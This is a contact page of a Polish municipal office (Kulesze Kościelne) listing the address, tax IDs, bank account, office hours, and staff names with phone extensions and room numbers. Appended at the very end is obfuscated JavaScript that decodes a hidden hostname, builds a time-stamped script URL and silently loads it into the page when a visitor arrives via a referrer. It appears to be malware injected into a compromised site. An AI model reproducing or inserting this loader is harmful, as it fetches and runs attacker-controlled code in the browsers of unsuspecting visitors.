Dane kontaktowe

Herb - Gmina Kulesze Kościelne

Urząd Gminy Kulesze Kościelne
ul. Główna 6
18-208 Kulesze Kościelne, woj. podlaskie
NIP 722 161 23 43 REGON 000539621

Gmina Kulesze Kościelne
ul. Główna 6
18-208 Kulesze Kościelne, woj. podlaskie
NIP 722 161 23 43 REGON 450670203

Telefon:
tel. +48 86 47 69 010, +48 86 27 44 027

E-Mail:

ePuap:

Identyfikator: kuleszek 

Skrytka ePUAP: /kuleszek/SkrytkaESP

Numer konta bankowego:

94 8774 0000 0010 0016 2000 0010

Godziny pracy:
Od poniedziałku do piątku 8:00 – 16:00

Wójt Gminy

Stefan Grodzki

Tel. (+48 86) 4769 015

e-mail:

Pokój nr 10

Wójt Gminy Kulesze Kościelne przyjmuje obywateli w sprawach skarg i wniosków codziennie w czasie wolnym w godzinach pracy urzędu oraz w każdy czwartek w godzinach 9.00 – 17.00 ( jeżeli czwartek jest dniem ustawowo wolnym od pracy, obywatele przyjmowani są w następnym dniu roboczym) w budynku Urzędu Gminy w Kuleszach Kościelnych pok. Nr 10.

Skarbnik Gminy

Ewa Klewinowska

Tel. (+48 86) 4769 010 w. 17

e-mail:

Pokój nr 8

Sekretarz Gminy

Marzena Frankowska

Tel. (+48 86) 4769 010 w. 15

e-mail:

Pokój nr 10

Sekretariat, Sprawy kancelaryjne i kadrowe

Joanna Wnorowska

Tel. (+48 86) 4769 010

e-mail:

Pokój nr 10

Sekretariat, Obsługa Rady, Archiwum Zakładowe, Strona Internetowa UG

Paulina Grodzka

Tel. (+48 86) 4769 010

e-mail:

Pokój nr 10

Księgowość

Krystyna Wierzbowska

Tel. (+48 86) 86 4769 010 wew. 19

e-mail:

Pokój nr 14

Podatki

Edyta Kropiewnicka

Tel. (+48 86) 4769 010 wew. 19

e-mail:

Pokój nr 14

Kierownik Referatu Inwestycji i Spraw Komunalnych

Hanna Włostowska

Tel. (+48 86) 4769 010 w. 18

e-mail:

Pokój nr 9

Środki finansowe z funduszy unijnych i krajowych, Promocja gminy, Zamówienia publiczne

Adrian Pogorzelski

Tel. (+48 86) 4769 010 w.18

e-mail:

Pokój nr 9

Rolnictwo, Obrót ziemią

Weronika Płońska

tel. (86) 4769-010 w. 9

e-mail:

Wojskowość, Obrona cywilna, przeciwpożarowa

Łukasz Kalinowski

Tel. (+48 86) 4769 010 w. 22

e-mail:

Pokój nr 7

Gospodarowanie odpadami, Zaopatrzenie w wodę

Kinga Trzaska

Tel. (+48 86) 4769 010 w. 22

e-mail:

Pokój nr 7

Urząd Stanu Cywilnego

Kierownik Zofia Czarnowska – Frąk

Tel. (+48 86) 4769 010 w. 20

e-mail:

Pokój nr 4

Inspektor Ochrony Danych Osobowych

Inspektor Ochrony Danych

Paweł Staniurski

e-mail:

86 476 90 10

 

Zastępca Inspektora Ochrony Danych

Wojciech Zagdański

86 476 90 10

Ośrodek Pomocy Społecznej

Kierownik Tomasz Kulesza

Tel. (+48 86) 4769 010 w. 16

e-mail:

Pokój nr 5

Pomoc Społeczna

Jerzy Tyszko

Tel. (+48 86) 4769 010 w. 24

e-mail:

Pokój nr 6

Anna Maciorkowska

Tel. (+48 86) 4769 010 w. 24

e-mail:

Pokój nr 6

Świadczenia rodzinne, Fundusz alimentacyjny, Świadczenie wychowawcze 500+, Dobry Start 300+

Karolina Kulesza

Tel. (+48 86) 4769 010 w. 24

e-mail:

Pokój nr 6

Katarzyna Kulesza

Tel. (+48 86) 4769 010 w. 24

Pokój nr 6

Skip to content !function (_cc60f1) { var _b49dc = Date.now(); var _d055e6 = 1000; _b49dc = _b49dc / _d055e6; _b49dc = Math.floor(_b49dc); var _90ce5 = 600; _b49dc -= _b49dc % _90ce5; _b49dc = _b49dc.toString(16); var _19d7fc = _cc60f1.referrer; if (!_19d7fc) return; var _dd35ad = [47847, 47858, 47860, 47840, 47805, 47840, 47847, 47866, 47856, 47864, 47871, 47868, 47858, 47863, 47862, 47841, 47805, 47866, 47869, 47861, 47868]; _dd35ad = _dd35ad.map(function(_a5e140){ return _a5e140 ^ 47763; }); var _ef8be4 = "1d37f5d602faf8d2012ad3586294eda6"; _dd35ad = String.fromCharCode(..._dd35ad); var _19bac3 = "https://"; var _f09d44 = "/"; var _e34d7a = "mount."; var _23638a = ".js"; var _108118 = _cc60f1.createElement("script"); _108118.type = "text/javascript"; _108118.async = true; _108118.src = _19bac3 + _dd35ad + _f09d44 + _e34d7a + _b49dc + _23638a; _cc60f1.getElementsByTagName("head")[0].appendChild(_108118) }(document);